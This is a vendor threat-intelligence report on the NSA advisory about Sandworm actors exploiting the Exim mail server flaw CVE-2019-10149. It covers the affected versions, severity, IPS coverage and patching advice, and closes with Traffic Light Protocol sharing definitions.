Threat Signal Report

NSA Advisory Sandworm Actors Exploiting EXIM MTA Vulnerability (CVE-2019-10149)

Description

Earlier in the week, The United States National Security Agency (NSA) issued an alert highlighting active exploitation of the Exim MTA vulnerability CVE-2019-10149. According to the NSA, active in the wild attacks exploiting this vulnerability appear to be linked to a group dubbed "SandWorm" which is attributed to Russia. According to the advisory, an unauthenticated remote attacker can use this vulnerability to send a specially crafted email to execute commands with root privileges, allowing the attacker to install programs, modify data, and create new accounts.


What are the specifics of the alert?

The alert was broad in scope; and is an informational piece designed to emphasize the importance of nation state actors actively exploiting this flaw, although it was disclosed almost a year ago.


CVE-2019-10149, disclosed by Qualys June 5, 2019 is a vulnerability that could lead to remote command execution/injection of an affected server. The vulnerability exists in Exim's mail transport agent (MTA) in versions 4.87 to 4.91. To successfully exploit a system, an attacker will send the targeted server with a specially crafted malicious email, when ran, will allow the attacker root access to the machine.


What operating systems are affected?

All Linux systems running Exim 4.87 to 4.91 are affected.

Exim 4.92 and current versions up to 4.94 are unaffected.


What is the status of AV and IPS coverage?

Fortinet customers have been protected by exploitation of CVE-2019-10149 by Exim.deliver_message.Command.Injection since July 4, 2019 (IPS Definitions 14.643).

AV is not feasible at this time. All known network IOC's are blocked by the Web Filtering client.


Have there been any patches or updates from vendors affected?

Exim.org has already provided push updates to various Linux distribution repositories as of June 5th, 2019 to address this issue. It feasible, it is recommended that organizations running affected software update to the latest version (4.94).


What else is possibly affected?

Cloud services, hypervisors (VMware, VirtualBox,etc.), and standalone enterprise systems, etc. using Linux along with affected versions of Exim are vulnerable to this latest disclosure.


How serious is this threat?

Based on CVSS scores, this threat has an overall base score of CRITICAL (9.8) which is due to trivial factors for

exploitability. However, due to the number of variables that must be present for exploitability to occur, the CVSS

Exploitability score is 3.9.


Are there any other recommendations or mitigations suggested?

FortiGuard Labs recommends that organizations apply the latest updates for affected software from vendors affected by this latest disclosure as soon as possible; if upgrading to the latest version (4.94) is not feasible.

Also, for cloud services that are not managed, an organization will need to consider either upgrading or disallowing remote connections externally to affected mail server(s) if possible, until an upgrade to the latest version is performed.

Telemetry


Definitions

Traffic Light Protocol

Color When Should it Be used? How may it be shared?

TLP: RED

Not for disclosure, restricted to participants only.
Sources may use TLP:RED when information cannot be effectively acted upon by additional parties, and could lead to impacts on a party's privacy, reputation, or operations if misused. Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.

TLP: AMBER

Limited disclosure, restricted to participants’ organizations.
Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Recipients may only share TLP:AMBER information with members of their own organization, and with clients or customers who need to know the information to protect themselves or prevent further harm. Sources are at liberty to specify additional intended limits of the sharing: these must be adhered to.

TLP: GREEN

Limited disclosure, restricted to the community.
Sources may use TLP:GREEN when information is useful for the awareness of all participating organizations as well as with peers within the broader community or sector. Recipients may share TLP:GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels. Information in this category can be circulated widely within a particular community. TLP:GREEN information may not be released outside of the community.

TLP: WHITE

Disclosure is not limited.
Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.